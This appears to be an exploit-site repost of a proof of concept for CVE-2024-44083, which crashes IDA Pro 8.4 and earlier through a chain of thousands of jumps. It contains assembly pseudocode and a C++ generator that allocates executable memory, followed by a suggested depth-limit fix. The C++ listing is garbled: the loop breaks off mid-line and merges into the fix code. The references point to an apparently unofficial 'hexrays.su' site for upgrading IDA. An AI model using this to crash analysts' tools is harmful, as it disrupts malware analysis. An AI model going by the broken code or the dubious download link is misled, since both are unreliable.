Exploit for Allocation of Resources Without Limits or Throttling in Hex-Rays Ida_Pro CVE-2024-44083

Name: Exploit for Allocation of Resources Without Limits or Throttling in Hex-Rays Ida_Pro CVE-2024-44083
Rating: 5 (252 reviews)
2025-12-29 | CVSS 7.5
## https://sploitus.com/exploit?id=D6D1F9BE-61C7-57A6-A6B7-774C88FC1FBA
# CVE-2024-44083

the original PoC repos got deleted (`github.com/Azvanzed/CVE-2024-44083`, `github.com/Azvanzed/IdaMeme`) so here it is. figured id recreate it for anyone who wants to understand how it works or test their setup.

IDA Pro ≤ 8.4 crashes when analyzing binaries with excessive jump chains.

## the bug

`ida64.dll` doesnt limit how deep it goes when following jump chains. so if you have a binary with thousands of linked jumps ending at the entry point and IDA just kills itself

| field | value |
|-------|-------|
| CVE | CVE-2024-44083 |
| affected | IDA Pro ≤ 8.4 |
| component | ida64.dll |
| CWE | CWE-770 (resource exhaustion) |
| impact | crash (DoS) |

## how it works

the idea is simple, make a section full of jumps that keep jumping to more jumps

```asm
; pseudocode obviously

section .text

; thousands of these
jump_0:
    jmp jump_1
jump_1:
    jmp jump_2
jump_2:
    jmp jump_3
; ... keep going ...
jump_9999:
    jmp payload

payload:
    call _start    ; this creates the cross-reference that breaks things

_start:
    ; IDA tries to resolve all the jumps pointing here
    ; boom crash
    ret
```

IDA tries to follow and track all these jumps building cross-references and with enough of them it just gives up and crashes

## doing it yourself (example)

if you wanted to make something like this in c++ youd do something like:

```cpp

#include 
#include 

// the idea is to generate a ton of jump instructions
// that chain together and eventually hit the entry point
void generate_jump_chain() {
    // allocate executable memory for our jump chain
    unsigned char* code = (unsigned char*)VirtualAlloc(
        NULL,
        10000 * 5 + 10,  // 10,000 jumps × 5 bytes + some extra
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    
    if (!code) return;
    
    int offset = 0;
    
    // create 10,000 chained jumps
    for (int i = 0; i  MAX_JUMP_DEPTH) {
        warn("jump chain too deep. fail.");
        return;  // dont crash just stop
    }
    
    address_t target = get_jump_target(addr);
    if (target) {
        analyze_jumps(target, depth + 1);
    }
}
```

literally just add a depth limit thats it.

## references

- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-44083)
- [hexrays.su](https://hexrays.su/) <-- to ugprade your ida
## disclaimer

for educational purposes only dont be a dick